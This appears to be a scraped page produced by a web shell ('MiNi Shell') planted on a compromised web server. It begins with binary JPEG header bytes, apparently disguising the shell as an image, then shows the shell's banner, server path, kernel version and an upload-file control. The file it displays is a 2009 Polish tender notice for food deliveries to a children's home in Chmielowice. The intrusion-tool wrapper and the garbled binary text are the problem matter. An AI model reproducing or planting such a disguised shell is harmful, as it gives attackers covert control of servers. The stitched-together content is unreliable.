JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/164590-N-2009.html

<p class="kh_header"><b>Komprachcice: Przetarg nieograniczony na dostawę żywności dla potrzeb wychowanków Domu Dziecka w Chmielowicach</b><br>
<b>Numer ogłoszenia: 164590 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Dziecka w Chmielowicach , Chmielowice, ul. Nyska 18, 46-070 Komprachcice, woj. opolskie, tel. 077 4743901, faks 077 4743901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatopolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budzetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę żywności dla potrzeb wychowanków Domu Dziecka w Chmielowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych do Domu Dziecka w Chmielowicach o wartości nie przekraczającej kwot określonych na podstawie art. 11 pkt 8 ustawy z dnia 29.01.2004 r.(Prawo Zamówień Publicznych Dz.U. z 2007 r. nr 223, poz. 1655 oraz z 2008 r. nr 171, poz. 1058.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.00.00-9, 15.50.00.00-3, 03.20.00.00-3, 15.89.60.00-5, 03.14.25.00-3, 15.20.00.00-0, 15.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się dostawcy, którzy spełniają nastepujące warunki: 
-posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ( zaświadczenie o wpisie do ewidencji działalności gospodarczej).
-posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (oświadczenie),
-znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (oświadczenie),
-nie podlegają wykluczeniu z postepowania o udzielenie zamówienia publicznego (oświadczenie) na podstawie art. 22 ust.1 pkt 4 w powiązaniu z art. 24 Pzp i zgodnie z art. 44 złożą wymagane w s.i.w.z. dokumenty potwierdzające spełnienie warunków udziału w postepowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta dostawcy wg wzoru załączonego do dokumentacji przetargowej i podpisana przez upełnomocnionych przedstawicieli (załącznik nr 1)
2. Formularze cenowe (załącznik nr 2) do SIWZ
3. Oświadczenie o spełnieniu warunków udziału w postepowaniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych i art. 24 Pzp (załącznik nr 3)
4. Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej- wystawione lub uaktualnione przez wystawiającego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5. Pełnomocnictwo do podpisywania oferty/do reprezentacji-o ile prawo do podpisywania oferty/do reprezentacji nie wynika z innych dokumentów złożonych wraz z ofertą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatopolski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Dziecka w Chmielowicach ul. Nyska 18 od poniedziałku do piątku w godzinach od 7:00 do 15:00 (sekretariat) po złożeniu zapotrzebowania oraz na stronie internetowej   www.bip.powiatopolski.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2009 godzina 10:00, miejsce: Dom Dziecka w Chmielowicach ul. Nyska 18 46-070 Komprachcice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1   Groch                               kg   8
2  Fasola                               kg  20
3  Mąka pszenna typ 500   	     kg  100  
4  Mąka ziemniaczana        	     kg  30
5 Kasza jęczmienna                  kg  20
6 Kasza gryczana                     kg  25
7  Ryż                                    kg 30
8    Makaron świdry            	      kg 15
9   Makaron nitki 400 g              szt. 35
10 Makaron spaghetti                kg 7
11 cukier                                 kg 400
12 Olej uniwersalny                    litr  90     w butelce
13 Dżem niskosłodzony       	       kg 160
14  Miód naturalny                     szt. 30
15 Majonez                               kg 80
16 Musztarda                            szt. 30
17 Koncentrat pomidorowy           kg 160
18 Ogórki kiszone                        kg 80
19 Ogórki konserwowe                  kg 100
20 Ketchup                                 szt. 80
21 Przyprawa maggi w płynie          litr 20
22  Pieprz naturalny                      szt. 47
23 Kwasek cytrynowy                    szt. 44
24 Przyprawa warzywko                 szt. 40
25 Sól kuchenna                            kg 35
26 Herbata ekspresowa                   szt. 13
27 Żurek śląski 1,30 kg	            szt. 2
28 Ziele angielskie                          szt. 7
29 Liść laurowy		            szt. 7
30 Majeranek		            szt. 7
31 Papryka słodka		            szt. 7
32 Przyprawa do mięsa                    szt. 25
33 Ziarenka smaku                          szt. 20
34 Margaryna                                 kg 80
35 Budyń                                       szt. 90
36 Galaretka                                   szt. 360
37 Kakao                                        szt. 36
38 Kawa zbożowa                            szt. 18
39 Kisiel			  	szt. 160
40 Koncentrat barszczu	             szt. 15
41 Krem do tortów	    	  	szt. 15
42 kukurydza		             szt. 21
43 Napoje owocowe		 szt. 320
44 Nutella			 szt. 60
45 Płatki śniadaniowe		 szt. 104
46 Proszek do pieczenia                   	  szt. 40
47 Sałatki warzywne                          szt. 40
48 Cukier waniliowy                        	  szt. 60
49 Przyprawa do kurczaka               	  szt. 25
50 Sos pieczeniowy		  szt. 120
51 Woda mineralna		               szt. 240
52 Lody			               szt. 270.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo świeże, wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Chleb baltonowski 0,8 kg                    szt. 1.100
2 Chleb razowy 0,5 kg                          szt. 620
3 Bułka tarta                                       kg  45
4 Rogal           0,100 g	                  szt. 2140
5 Bułka wyborowa    0,400 g	                  szt. 2140

Oferowane pieczywo powinno być bardzo dobrej jakości, świeże (2%), dobrze wypieczone (2%),o swoistym smaku i zapachu (3,5%), nie kruszące się przy krojeniu (2%),o strukturze jednolitej (1,5%), sprężyste przy nacisku (2%), określonej wagi i pozbawione chemicznych ulepszaczy (2%). Podmiot powinien wykazać się decyzją Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych. Podmiot powinien wykazać w formie zaświadczenia fakt doraźnego nadzoru produkcji i sprzedaży dokonywanego przez Inspekcję Sanitarną.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Mleko spożywcze 2%                         litr 2000                     Op = 91
2 Śmietana 18 %			     szt. 380                     Op = 400g
3  Jogurt naturalny                               szt. 600                     Op = 190g
4 Ser homogenizowany                          szt. 1000                   Op = 125g
5 Twaróg półtłusty                                kg 150                      Op = 250g
6 Ser żółty                                          kg 120
7 Maślanka                                          litr 60                        Op = 400g
8 Ser topiony                                       kg 80                        Op = 25g
9 Masło exstra niewolone w kostce           kg 280                      Op = 200g
   o zawartości min. 82% tłuszczu mlecznego

Oferowane mleko i produkty mleczarskie powinny być bardzo dobrej jakości, świeże określonej wagi, oraz powinny być dostarczone z zachowaniem daty do spożycia a także winny być zgodne z Polskimi Normami. Wszystkie produkty powinny cechować się jednolitą konsystencją, właściwym kolorem, swoistym zapachem i smakiem. Produkty powinny być pozbawione zanieczyszczeń i uszkodzeń mechanicznych oraz oznak pleśni czy zepsucia. Podmiot dostarczający wyżej wymienione artykuły powinien wykazać się decyzją Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych. Podmiot powinien wykazać w formie zaświadczenia fakt doraźnego nadzoru produkcji i sprzedaży prowadzoną przez Inspekcję Sanitarną..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Owoce i warzywa korzeniowe, liściaste i inne ( w tym ziemniaki).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1  Buraki				kg 100
2 Marchew			kg 150
3. Cebula				kg 160
4 Kapusta biała			kg 140
5 Kapusta włoska			kg 40
6 Kapusta kiszona			kg 150
7 Kapusta pekińska			kg 50
8 Por				kg 140
9 Papryka świeża			kg 50
10 Pomidor świeży			kg 160
11 Ogórek świeży			kg 100
12 Sałata świeża			szt.160
13 Koper świeży			kg 50
14 Szczypior			kg 250
15 Natka				kg 50
16 Rzodkiewka			kg 100
17 Pieczarki świeże		             kg 40
18 Fasolka szparagowa świeża	kg 40
19 Botwinka			kg 30
20 Kalafior			szt. 50
21Cukinia			             kg 20
22 Jabłka deserowe		kg 500
23 Cytryna			kg 8
24 Truskawska  świeża		kg 30
25 Banany			kg 260
26 Mandarynki			kg 50
27 Pomarańcze			kg 60
28 Arbuz				kg 80
29 Brzoskwinie			kg 40
30 Winogron			kg 50
31. Ziemniaki jadalne		kg 2500
Oferowane produkty powinny być bardzo dobrej jakości i świeże. Warzywa i owoce świeże powinny być jednej odmiany, dojrzałe, bez oznak zepsucia i zanieczyszczeń czy uszkodzeń mechanicznych oraz szkodników. Oferowane pomidory powinny cechować się wagą jednej sztuki od 0,08 do 0,09 kg. Waga jednej sztuki owocu powinna wynosić: Jabłko 0,14 - 0,15kg; Banan 0,19 - 0,20kg; Kiwi 0,09-0,10kg. Podmiot powinien wykazać się decyzją Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych.
Ziemniaki jadalne powinny odznaczać sie jednakowa wielkością i jędrnością oraz powinny być nieprzemarzniete, bez oznak zepsucia i zanieczyszczeń mechanicznych czy uszkodzeń, oraz szkodników..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty głęboko mrożone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Pietruszka kostka		kg 20
2 Seler kostka			kg 20
3 Mieszanka kompotowa		kg 200
4 Truskawki			kg 20
5 Pierogi z kapustą i grzybami	kg 7
6 Uszka z kapustą i grzybami	             kg 8
7 Frytki				kg 20
Oferowane produkty mrożone powinny być bardzo dobrej jakości i dojrzałe. Mrożone owoce i warzywa ponadto powinny być dostarczane bez oznak wcześniejszego rozmrożenia i ponownego zamrożenia bez cząstek lodu i zbryleń produktów oraz z zachowaniem daty do spożycia. Mrożone owoce i warzywa powinny być czyste, sypkie bez złepień. Podmiot powinien wykazać się decyzją Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych. Podmiot dostarczający mrożone owoce i warzywa powinien wykazać w formie zaświadczenia, fakt doraźnego nadzoru produkcji i sprzedaży, prowadzonego przez Inspekcję Sanitarną. Owoce i warzywa powinny mieć zachowaną datę do spożycia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jaja świeże (L)  szt. 4000

Jajka powinny być jednakowej klasowości (L) wg Polskich Norm. Jajka powinny być bez zanieczyszczeń i uszkodzeń mechanicznych. Podmiot powinien wykazać się decyzją Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych. Podmiot dostarczający jajka powinien wykazać w formie zaświadczenia fakt stałej kontroli dokonywanej przez Inspekcję Weterynaryjną. Produkt powinien mieć zachowaną datę do spożycia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ryby przetworzone i konserwowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Filet rybny PANGA	kg 340
2 Śledź w pomidorach	szt. 200                       Op = 175g
3 Makrela wędzona	             kg 10
4 Śledź Matjas		kg 12
Oferowane ryby powinny być bardzo dobrej jakości, świeże, powinny mieć zachowaną datę do spożycia, filety z ryby powinny być pozbawione skóry i ości, posiadać zwartą strukturę mięsa płaty w całości (nierozdrobnione). Ubytek filetu rybnego po odmrożeniu nie może przekraczać 25%. Podmiot powinien wykazać się decyzją Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych. Podmiot powinien wykazać, w formie zaświadczenia fakt doraźnego nadzoru produkcji dokonywanego przez Inspekcję Sanitarną .Ryby mrożone powinny być dostarczane według potrzeby ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mięso i wędliny ( w tym mięso i wyroby drobiowe).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Udka, udźce			kg 50
2 Filet drobiowy			kg 60
3 Żołądki drobiowe		             kg 10
4 Wątróbka drobiowa		kg 10
5 Pasztet drobiowy			kg 14
6 Szynka drobiowa			kg 15
7 Porcje rosołowe			kg 50
8 Boczek wędzony 			kg 50
9  Kiełbasa cienka			kg 100
10 Parówki wieprzowe		kg 85
11 Mielonka tyrolska blok		kg 45
12 Szynka biała			kg 45
13 Szynka gotowana		kg 45
14 Biały indyk			kg 45
15 Pasztet			kg 20
16 Schab bez kości		kg 64
17 Łopatka bez kości		kg 48
18 Żeberka paski			kg 20
19 Karczek bez kości		kg 70
20 Mięso mielone			kg 80
21 Mięso gulaszowe		kg 20
22 Mięso wołowe			kg 45
Oferowane produkty powinny być bardzo dobrej jakości, świeże, z zachowaną datą przydatności do spożycia, ich wygląd nie powinien budzić wątpliwości, co do gatunku oraz spełniać określone normy .Mięso w elementach prawidłowo wykrwawione, ocieknięte bez przebarwień i uszkodzeń mechanicznych bez resztek kostnych i chrząstek oraz skóry i pierza. Podroby w elementach prawidłowo wykrwawione, ocieknięte bez przebarwień i uszkodzeń mechanicznych .Ponadto wędliny na bazie mięsa drobiowego powinny nadawać się do krojenia w plastry, tj. szynka nie mogą się kruszyć przy krojeniu i charakteryzować się średnicą przekroju 7-8 cm. Podmiot powinien wykazać się decyzją Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych. Podmiot powinien wykazać się weterynaryjnym świadectwem zdrowia dla oferowanych produktów pochodzenia mięsnego. Podmiot powinien wykazać się weterynaryjnym świadectwem zdrowia dla oferowanych produktów pochodzenia mięsnego. Podmiot powinien wykazać w formie zaświadczenia fakt stałej kontroli produkcji i sprzedaży dokonywanej przez Inspekcję Weterynaryjną..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com